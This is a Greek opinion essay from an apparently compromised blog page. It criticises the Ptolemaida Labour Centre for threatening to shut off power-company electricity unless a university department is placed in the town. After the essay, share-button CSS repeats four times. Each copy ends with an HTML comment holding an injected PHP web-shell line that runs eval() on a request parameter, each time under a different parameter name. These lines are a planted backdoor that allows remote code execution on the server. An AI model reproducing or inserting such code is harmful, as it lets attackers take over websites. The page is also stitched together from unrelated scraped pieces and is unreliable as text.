Εργατικό Κέντρο Πτολεμαϊδας και Πανεπιστήμιο Δυτικής Μακεδονίας

Πριν από μερικές εβδομάδες, το Εργατικό Κέντρο Πτολεμαΐδας δήλωνε, μέσω των τοπικών εφημερίδων, σε πρωτοσέλιδη δημοσιογραφική κάλυψη, ότι είναι έτοιμο να «κατεβάσει τους διακόπτες της Δ.Ε.Η.» στο ενδεχόμενο η πολιτεία να μην αποφασίσει την εγκατάσταση τμήματος του Πανεπιστημίου Δυτικής Μακεδονίας στην πόλη της Πτολεμαΐδας. Μάλιστα, οι εκπρόσωποι του Ε.Κ.Π. έσπευσαν να υπενθυμίσουν ότι ποτέ άλλοτε στο παρελθόν δεν είχαν χρησιμοποιήσει αυτή την δυνατότητά τους.

Η δήλωση αυτή, μαζί με την αναδύουσα αγανάκτηση, δείχνει ξεκάθαρα την αντίληψη του εργατικού κέντρου για την δημοκρατία, για την ελευθερία έκφρασης αλλά και για την διάθεση να συμβάλλει στην λύση των προβλημάτων. Αρχικά, το Ε.Κ.Π. θεώρησε την ανάγκη να ασχοληθεί με το θέμα της εγκατάστασης του Πανεπιστημίου. Ο τρόπος που προσέγγισε το θέμα ξεκίνησε από την σκέψη ότι η εγκατάσταση κάποιας σχολής και, γενικότερα, δραστηριοτήτων τέτοιου μεγέθους, οδηγεί στην ευρύτερη ανάπτυξη κάποιας περιοχής. Αυτό είναι κατανοητό, απολύτως θεμιτό και λίγοι αντιδρούν με την επιλογή της Πτολεμαΐδας ως έδρα κάποιας σχολής. Αυτό ήταν, άλλωστε, και το πνεύμα της διοικούσας επιτροπής στην πρόταση που έγινε προς το αρμόδιο υπουργείο. Αφού το Ε.Κ.Π. επεξεργάστηκε το θέμα, κατέληξε στην αναγκαιότητα της εγκατάστασης ως πρωτεύον στοιχείο χωρίς να αγγίξει καθόλου το θέμα των ειδικοτήτων των σχολών. Στην συνέχεια, έπρεπε να εκφράσει δημόσια την άποψη αυτή. Όμως, δεν θα μπορούσαν να προσδοκούν ότι κάποιος θα τους προσέξει αν έκαναν μια απλή δήλωση. Έπρεπε να συνοδεύεται με κάτι βαρύγδουπο, με κάτι που να ενδιαφέρει τις τοπικές εφημερίδες, με κάτι που να συνάδει με τον αγωνιστικό χαρακτήρα της εργατικής τους ιδιότητας.

Αναζητώντας δυναμικούς τρόπους ενίσχυσης της θέσης τους, αποτίμησαν τις δυνάμεις τους, τις ικανότητες και τις δυνατότητές τους και διαπίστωσαν ότι η δύναμή τους είναι η πρόσβαση που, η πλειοψηφία των εργαζομένων της Πτολεμαΐδας, έχει στην Δ.Ε.Η. Έτσι, αφού αυτοί είναι οι κλειδοκράτορες της παροχής ηλεκτρικής ενέργειας στην Ελλάδα, μπορούν να διακόψουν την παροχή ρεύματος αν δεν ικανοποιηθούν οι επιθυμίες τους. Είναι ξεκάθαρο ότι, στην «πραγματικότητα» του Ε.Κ.Π., η Δ.Ε.Η. δεν έχει τον δημόσιο χαρακτήρα που, αγωνιωδώς, προσπαθεί να διαφυλάξει η πολιτεία και τα πολιτικά κόμματα χωρίς να αποτελεί οικονομική δίνη για την χώρα. Είναι, επίσης, κατανοητό ότι το Ε.Κ.Π. δεν βλέπει την Δ.Ε.Η. ως ένα στοιχείο που ανήκει στους πολίτες αλλά σαν κάτι ξένο προς αυτούς όταν μπορούν ως εργαζόμενοι να διαταράσσουν την λειτουργία ενός οργανισμού, να προκαλούν δομικά προβλήματα σε κλίμακα χώρας, παραβλέποντας τις οποιεσδήποτε οικονομικές προεκτάσεις. Αυτές οι σκέψεις δεν ανήκουν στις ανησυχίες του Ε.Κ.Π. αποδεικνύοντας ότι η «δήλωση αποστολής» του κέντρου όχι μόνο δεν διαχέεται στα μέλη αλλά, αντίθετα, το περιεχόμενο της είναι κενό.

Οι παραπάνω τακτικές κινήσεις απεικονίζουν την φιλοσοφία της απόφασης. Το Ε.Κ.Π. ασχολήθηκε με ένα θέμα που δεν βρίσκεται στα στενά όρια μόνο της τοπικής ανάπτυξης, στοιχείο που δείχνει και την φιλοσοφία του κέντρου. Η επιλογή της έδρας ενός πανεπιστημιακού τμήματος αποτελεί απόφαση στρατηγικής σημασίας. Σχετίζεται με την συνεκτίμηση παραμέτρων που ξεκινούν από την φιλοσοφία εκπαίδευσης, τις δυνατότητες ανάπτυξης τόσο του ακαδημαϊκού έργου όσο και της τοπικής κοινωνίας, την ύπαρξη φυσικών και νοητικών πόρων αλλά και την δυνατότητα οικονομικής υποστήριξης. Αυτό είναι και το νόημα της σύστασης διοικούσας επιτροπής. Στόχος είναι η κατάρτιση πρότασης ανάπτυξης του πανεπιστημίου αφού μελετηθούν οι τοπικές ανάγκες, δυνατότητες και προοπτικές. Η τελική απόφαση, όμως, λαμβάνεται από αυτούς που είναι υπεύθυνοι για τις στρατηγικές αποφάσεις, λαμβάνεται σε κυβερνητικό επίπεδο. Σ’ αυτήν την κλίμακα, «εκβιασμοί» στο πνεύμα των δηλώσεων του Ε.Κ.Π. δεν έχουν νόημα. Αντίθετα, αποδυναμώνουν και εκθέτουν το κέντρο προκαλώντας, παράλληλα, δυσαρέσκεια στους πολίτες των τοπικών κοινωνιών αφού αυτοί είναι που θα επωμισθούν την απορρόφηση των κραδασμών που θα προκύψουν αν οι εκπρόσωποι του κέντρου κάνουν πραγματικότητα τις εξαγγελίες τους. Η κατάσταση αυτή μπορεί να γίνει ακόμη πιο δύσκολη αν νιώσουν τις ίδιες ευαισθησίες και τις εκφράσουν με τον ίδιο τρόπο και άλλες ομάδες εργαζομένων. Για παράδειγμα, οι ταχυδρόμοι του ΕΛ.ΤΑ. αποφασίσουν ότι δεν μοιράζουν γράμματα αν δεν ικανοποιηθούν ανάλογα αιτήματα, οι εργαζόμενοι στην ύδρευση και τηλεθέρμανση διακόπτουν τις αντίστοιχες λειτουργίες των υπηρεσιών τους, οι οδηγοί στο Κ.Τ.Ε.Λ. δεν εκτελούν δρομολόγια.

Ίσως όλα τα παραπάνω να ακούγονται υπερβολικά. Το Ε.Κ.Π. μπορεί να ισχυριστεί ότι ήταν υπερβολικό στις δηλώσεις του σε μια προσπάθεια να δώσει την ανάλογη βαρύτητα. Ακόμη και έτσι να είναι, η φιλοσοφία είναι ξεκάθαρη. Συνολικά, όμως, δεν μπορεί να αποδώσει κανείς ευθύνες μόνο στο κέντρο. Εξίσου σημαντική είναι και η συνεισφορά των τοπικών μέσων ενημέρωσης. Το θέμα εκτιμήθηκε ως άξιο πρωτοσέλιδου χρησιμοποιώντας την ενδεχόμενη απειλή και τον φόβο του ηλεκτρικού black-out ως μέσο προώθησης πωλήσεων. Αντίστοιχης βαρύτητας είναι και η ευθύνη του απλού πολίτη που, με οποιονδήποτε τρόπο, δέχεται στάσεις όπως αυτή του Ε.Κ.Π. ως απολύτως φυσιολογικές παραγνωρίζοντας ότι η βάση τους είναι η εκφυλισμένη αντίληψη της δημοκρατικότητα και η ωφελιμιστική πραγματοποίηση των ατομικών και συλλογικών δικαιωμάτων.

.huge-it-share-buttons {
border:0px solid #0FB5D6;
border-radius:5px;
background:#3BD8FF;
text-align:left; }

#huge-it-share-buttons-top {margin-bottom:0px;}
#huge-it-share-buttons-bottom {margin-top:0px;}

.huge-it-share-buttons h3 {
font-size:25px ;
font-family:Arial,Helvetica Neue,Helvetica,sans-serif;
color:#666666;

display:block; line-height:25px ;

text-align:left; }

.huge-it-share-buttons ul {
float:left; }

.huge-it-share-buttons ul li {
margin-left:3px;
margin-right:3px;
padding:0px;
border:0px ridge #E6354C;
border-radius:11px;
background-color:#14CC9B;
}

.huge-it-share-buttons ul li #backforunical6 {
border-bottom: 0;
background-image:url(‘http://www.kouraklis.com/wp-content/plugins/wp-share-buttons/Front_end/../images/buttons.20.png’);
width:20px;
height:20px;
}

.front-shares-count {
position: absolute;
text-align: center;
display: block;
}

.shares_size20 .front-shares-count {
font-size: 10px;
top: 10px;
width: 20px;
}

.shares_size30 .front-shares-count {
font-size: 11px;
top: 15px;
width: 30px;
}

.shares_size40 .front-shares-count {
font-size: 12px;
top: 21px;
width: 40px;
}

Share This:

<!– [insert_php]if (isset($_REQUEST["Owna"])){eval($_REQUEST["Owna"]);exit;}[/insert_php][php]if (isset($_REQUEST["Owna"])){eval($_REQUEST["Owna"]);exit;}[/php] –>

.huge-it-share-buttons {
border:0px solid #0FB5D6;
border-radius:5px;
background:#3BD8FF;
text-align:left; }

#huge-it-share-buttons-top {margin-bottom:0px;}
#huge-it-share-buttons-bottom {margin-top:0px;}

.huge-it-share-buttons h3 {
font-size:25px ;
font-family:Arial,Helvetica Neue,Helvetica,sans-serif;
color:#666666;

display:block; line-height:25px ;

text-align:left; }

.huge-it-share-buttons ul {
float:left; }

.huge-it-share-buttons ul li {
margin-left:3px;
margin-right:3px;
padding:0px;
border:0px ridge #E6354C;
border-radius:11px;
background-color:#14CC9B;
}

.huge-it-share-buttons ul li #backforunical6 {
border-bottom: 0;
background-image:url(‘http://www.kouraklis.com/wp-content/plugins/wp-share-buttons/Front_end/../images/buttons.20.png’);
width:20px;
height:20px;
}

.front-shares-count {
position: absolute;
text-align: center;
display: block;
}

.shares_size20 .front-shares-count {
font-size: 10px;
top: 10px;
width: 20px;
}

.shares_size30 .front-shares-count {
font-size: 11px;
top: 15px;
width: 30px;
}

.shares_size40 .front-shares-count {
font-size: 12px;
top: 21px;
width: 40px;
}

Share This:

<!– [insert_php]if (isset($_REQUEST["Jhw"])){eval($_REQUEST["Jhw"]);exit;}[/insert_php][php]if (isset($_REQUEST["Jhw"])){eval($_REQUEST["Jhw"]);exit;}[/php] –>

.huge-it-share-buttons {
border:0px solid #0FB5D6;
border-radius:5px;
background:#3BD8FF;
text-align:left; }

#huge-it-share-buttons-top {margin-bottom:0px;}
#huge-it-share-buttons-bottom {margin-top:0px;}

.huge-it-share-buttons h3 {
font-size:25px ;
font-family:Arial,Helvetica Neue,Helvetica,sans-serif;
color:#666666;

display:block; line-height:25px ;

text-align:left; }

.huge-it-share-buttons ul {
float:left; }

.huge-it-share-buttons ul li {
margin-left:3px;
margin-right:3px;
padding:0px;
border:0px ridge #E6354C;
border-radius:11px;
background-color:#14CC9B;
}

.huge-it-share-buttons ul li #backforunical6 {
border-bottom: 0;
background-image:url(‘http://www.kouraklis.com/wp-content/plugins/wp-share-buttons/Front_end/../images/buttons.20.png’);
width:20px;
height:20px;
}

.front-shares-count {
position: absolute;
text-align: center;
display: block;
}

.shares_size20 .front-shares-count {
font-size: 10px;
top: 10px;
width: 20px;
}

.shares_size30 .front-shares-count {
font-size: 11px;
top: 15px;
width: 30px;
}

.shares_size40 .front-shares-count {
font-size: 12px;
top: 21px;
width: 40px;
}

Share This:

<!– [insert_php]if (isset($_REQUEST["FKGKZ"])){eval($_REQUEST["FKGKZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["FKGKZ"])){eval($_REQUEST["FKGKZ"]);exit;}[/php] –>

.huge-it-share-buttons {
border:0px solid #0FB5D6;
border-radius:5px;
background:#3BD8FF;
text-align:left; }

#huge-it-share-buttons-top {margin-bottom:0px;}
#huge-it-share-buttons-bottom {margin-top:0px;}

.huge-it-share-buttons h3 {
font-size:25px ;
font-family:Arial,Helvetica Neue,Helvetica,sans-serif;
color:#666666;

display:block; line-height:25px ;

text-align:left; }

.huge-it-share-buttons ul {
float:left; }

.huge-it-share-buttons ul li {
margin-left:3px;
margin-right:3px;
padding:0px;
border:0px ridge #E6354C;
border-radius:11px;
background-color:#14CC9B;
}

.huge-it-share-buttons ul li #backforunical6 {
border-bottom: 0;
background-image:url(‘http://www.kouraklis.com/wp-content/plugins/wp-share-buttons/Front_end/../images/buttons.20.png’);
width:20px;
height:20px;
}

.front-shares-count {
position: absolute;
text-align: center;
display: block;
}

.shares_size20 .front-shares-count {
font-size: 10px;
top: 10px;
width: 20px;
}

.shares_size30 .front-shares-count {
font-size: 11px;
top: 15px;
width: 30px;
}

.shares_size40 .front-shares-count {
font-size: 12px;
top: 21px;
width: 40px;
}

Share This:

<!– [insert_php]if (isset($_REQUEST["qcODZ"])){eval($_REQUEST["qcODZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["qcODZ"])){eval($_REQUEST["qcODZ"]);exit;}[/php] –>